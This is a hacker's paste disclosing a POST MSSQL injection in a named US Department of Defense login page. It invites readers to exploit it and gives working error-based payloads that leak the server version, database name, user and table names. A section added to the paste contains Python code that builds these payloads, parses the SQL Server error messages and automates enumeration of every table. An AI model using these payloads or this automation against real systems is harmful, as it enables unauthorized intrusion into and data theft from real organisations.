 ______ ___ _____
|___ / / _ \| __ \
  / / ___ _ __| | | | |__) |_ ___ __
 / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
/ /_| __/ | | |_| | | \ V V /| | | |
/_____\___|_| \___/|_| \_/\_/ |_| |_| Zer0Pwn - @Zer0Pwn
###############################################
Hello, friends. Today, I have quite an interesting vulnerability to share. I have tested it, and it does work. So instead of exploiting it, I thought I'd let you guys have some fun messing around with it. The vulnerability lies in the good old U.S. Department of Defense (dod.mil). The vulnerability is POST MSSQL injection. A lot of sites are vulnerable to this same one, so keep checking for this same kind of thing on other websites as well. Enjoy.
###############################################
Target ==> United States Department of Defense
Reason ==> Thought I'd go a little more hard-core.
Site ==> http://www.dod.mil/
Vulnerability ==> POST MSSQL Injection
Vulnerable Area ==> https://www.jieddo.dod.mil/jcwe/intel/externallogin.asp
Instructions:
You must put an email before any of your queries, or else it won't work. The injection is error-based: each payload closes the string literal with a single quote, forces SQL Server to convert a string into an int, and the conversion error the page echoes back contains that string. The trailing -- comments out the rest of the original query. For example, a first probe (HAVING with no GROUP BY makes SQL Server error out with the name of the first selected column):
asd@asd.com' HAVING 1=1--
To get the version:
asd@asd.com' or 1=convert(int, @@version)--
To get the database:
asd@asd.com' or 1=convert(int, db_name())--
To get the current user:
asd@asd.com' or 1=convert(int, user_name())--
To get tables (this returns only the first table name; exclude the names you already have with a NOT IN list to walk through the rest):
asd@asd.com' or 1=convert(int,(select top 1 table_name from information_schema.tables))--
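The following is an added worked example, not part of the original paste and not the author's or the target's code. It shows how the error-based payloads above compose, how the leaked value is pulled back out of SQL Server's conversion error text, and how the single "select top 1" table probe generalises to enumerating every table with a NOT IN exclusion list. Everything about the back end is assumed: the concatenated query template is a hypothetical reconstruction (the paste shows only the payloads), the error strings are constructed samples in the two phrasings SQL Server uses for conversion failures, and the fake server used to drive the loop is constructed for the demonstration.

```python
"""Error-based MSSQL injection helpers (added example; assumptions labelled inline)."""
import re
from typing import Callable, List, Optional

# Hypothetical back-end query, assumed for illustration: the e-mail field is
# concatenated straight into T-SQL, which is the only way the paste's payloads
# could work. Not taken from the target.
QUERY_TEMPLATE = "SELECT id FROM users WHERE email = '{email}'"


def compose_query(user_input: str, template: str = QUERY_TEMPLATE) -> str:
    """Show what a concatenating server would actually execute for a given input."""
    return template.format(email=user_input)


def error_payload(email: str, expression: str) -> str:
    """Error-based probe: close the literal, force varchar->int conversion of
    `expression` so its value lands in the error text, comment out the rest.
    `email` is whatever satisfies the form's e-mail requirement."""
    return f"{email}' or 1=convert(int,{expression})--"


def table_payload(email: str, known_tables: List[str]) -> str:
    """Generalisation of the paste's `top 1` table probe: exclude names already
    recovered so each request leaks the next table."""
    subquery = "select top 1 table_name from information_schema.tables"
    if known_tables:
        # A single quote inside a name would break the literal; T-SQL doubles it.
        quoted = ",".join("'" + t.replace("'", "''") + "'" for t in known_tables)
        subquery += f" where table_name not in ({quoted})"
    return error_payload(email, f"({subquery})")


# SQL Server phrases the conversion failure two ways depending on version:
#   2005+: Conversion failed when converting the nvarchar value 'X' to data type int.
#   2000:  Syntax error converting the nvarchar value 'X' to a column of data type int.
_CONVERSION_ERROR = re.compile(
    r"converting the n?(?:var)?char value '(?P<value>.*)' to (?:a column of )?data type int",
    re.DOTALL,
)


def leaked_value(response_body: str) -> Optional[str]:
    """Extract the leaked string from an error page, or None if no conversion error appeared."""
    m = _CONVERSION_ERROR.search(response_body)
    return m.group("value") if m else None


def enumerate_tables(email: str, send: Callable[[str], str], limit: int = 100) -> List[str]:
    """Walk information_schema.tables one name per request.
    `send` posts a payload and returns the response body (HTTP left to the caller)."""
    found: List[str] = []
    while len(found) < limit:
        name = leaked_value(send(table_payload(email, found)))
        if name is None or name in found:
            break
        found.append(name)
    return found


def make_fake_server(tables: List[str]) -> Callable[[str], str]:
    """Constructed stand-in for the vulnerable page: honours the NOT IN list in the
    payload and answers like a classic ASP page echoing the OLE DB error."""
    def send(payload: str) -> str:
        remaining = [t for t in tables if f"'{t}'" not in payload]
        if not remaining:
            return "Login failed."
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
                f"Conversion failed when converting the nvarchar value '{remaining[0]}' "
                "to data type int.")
    return send


if __name__ == "__main__":
    print(compose_query(error_payload("asd@asd.com", "@@version")))
    fake = make_fake_server(["users", "sessions", "audit_log"])  # constructed sample data
    print(enumerate_tables("asd@asd.com", fake))
```

The regex accepts both error phrasings because a page will not tell you up front which SQL Server generation sits behind it; if `leaked_value` returns None for every probe, the application is swallowing database errors and the same injection would have to be driven blind (boolean or time-based) instead.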
After you're done messing around, check me out on Twitter: @Zer0Pwn
###############################################
Also, I released this on my Twitter, but I'm sure not everyone has heard it yet. Anyways, I have left @TheWikiBoat. We had some personal issues going on between us, and I eventually decided it would be best for me and for the group that I leave. So now I'm flying solo again.